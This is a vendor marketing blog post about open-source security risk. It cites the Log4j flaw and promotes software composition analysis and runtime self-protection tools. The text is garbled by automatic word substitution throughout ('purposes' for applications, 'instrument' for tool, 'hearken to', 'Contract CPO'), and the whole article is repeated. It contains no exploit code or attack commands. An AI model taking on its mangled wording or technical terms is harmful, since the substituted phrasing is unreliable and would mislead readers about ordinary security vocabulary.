For a deep dive on the security dangers of OSS, hearken to Contract CPO Steve Wilson’s dialog with Secure Talk.
How safe is your on-line banking app? Don’t know? Join the membership.
Web purposes are constructed on the code equal of tangled spaghetti, together with open-source software program (OSS) with humorous, obscure names: say, Apache, Struts or Log4j — software program that can introduce security points associated to newly found vulnerabilities.
One excruciating instance was Log4j, a easy logging instrument. In December 2021, it was found to have a serious security flaw that was exploited inside hours of its discovery having gone public.
It’s not that OSS is extra susceptible to security flaws than proprietary software program, thoughts you. No, the issue is that these open-source parts are extraordinarily pervasive. If someone finds a vulnerability in one in every of them, they can use that flaw to take advantage of hundreds — and even hundreds of thousands — of purposes.
There are a slew of instruments to scan code. But these scanners aren’t fitted to fashionable software program growth. They bleat out so many false positives, the alerts wind up getting ignored.
Fortunately, fashionable instruments use an strategy higher suited to fashionable software program software growth. Called Software Composition Analysis (SCA), these instruments examine your open-source libraries in opposition to the MITRE vulnerabilities database. One such is CodeSec: a free instrument from Contrast that you just can run in opposition to your software’s libraries to smell out recognized vulnerabilities.
But SCA received’t shield you from zero-day vulnerabilities similar to Log4j and Spring4Shell. For that, you want runtime protection constructed into your purposes. In the case of Log4j, in the event you have been operating Runtime Application Self-Protection (RASP), you didn’t must know in regards to the Log4j library’s flaw. Rather, RASP would have detected software habits related to frequent internet software vulnerabilities, such because the injection assault enabled by the Log4j vulnerability.
When clients utilizing our Contrast Protect RASP instrument examined for Log4j, their apps weren’t exploitable. What which means: Their builders obtained to go house for the weekend as an alternative of looking for Log4j and patching.
Don’t worry OSS. Just just be sure you’ve obtained the appropriate instruments to make sure it’s a well mannered visitor inside your software — one which lets your devs loosen up on the weekend.
For a deep dive on the security dangers of OSS, hearken to Contract CPO Steve Wilson’s dialog with Secure Talk.
Lisa Vaas, Senior Content Marketing Manager
Subscribe to the Contrast Blog
By subscribing to our weblog you’ll keep on high of all the most recent appsec information and devops greatest practices. You may also learn of the most recent Contrast product information and thrilling software security occasions.
For a deep dive on the security dangers of OSS, hearken to Contract CPO Steve Wilson’s dialog with Secure Talk.
How safe is your on-line banking app? Don’t know? Join the membership.
Web purposes are constructed on the code equal of tangled spaghetti, together with open-source software program (OSS) with humorous, obscure names: say, Apache, Struts or Log4j — software program that can introduce security points associated to newly found vulnerabilities.
One excruciating instance was Log4j, a easy logging instrument. In December 2021, it was found to have a serious security flaw that was exploited inside hours of its discovery having gone public.
It’s not that OSS is extra susceptible to security flaws than proprietary software program, thoughts you. No, the issue is that these open-source parts are extraordinarily pervasive. If someone finds a vulnerability in one in every of them, they can use that flaw to take advantage of hundreds — and even hundreds of thousands — of purposes.
There are a slew of instruments to scan code. But these scanners aren’t fitted to fashionable software program growth. They bleat out so many false positives, the alerts wind up getting ignored.
Fortunately, fashionable instruments use an strategy higher suited to fashionable software program software growth. Called Software Composition Analysis (SCA), these instruments examine your open-source libraries in opposition to the MITRE vulnerabilities database. One such is CodeSec: a free instrument from Contrast that you just can run in opposition to your software’s libraries to smell out recognized vulnerabilities.
But SCA received’t shield you from zero-day vulnerabilities similar to Log4j and Spring4Shell. For that, you want runtime protection constructed into your purposes. In the case of Log4j, in the event you have been operating Runtime Application Self-Protection (RASP), you didn’t must know in regards to the Log4j library’s flaw. Rather, RASP would have detected software habits related to frequent internet software vulnerabilities, such because the injection assault enabled by the Log4j vulnerability.
When clients utilizing our Contrast Protect RASP instrument examined for Log4j, their apps weren’t exploitable. What which means: Their builders obtained to go house for the weekend as an alternative of looking for Log4j and patching.
Don’t worry OSS. Just just be sure you’ve obtained the appropriate instruments to make sure it’s a well mannered visitor inside your software — one which lets your devs loosen up on the weekend.
For a deep dive on the security dangers of OSS, hearken to Contract CPO Steve Wilson’s dialog with Secure Talk.
https://securityboulevard.com/2022/09/open-source-brings-security-risk-but-sca-rasp-can-help/
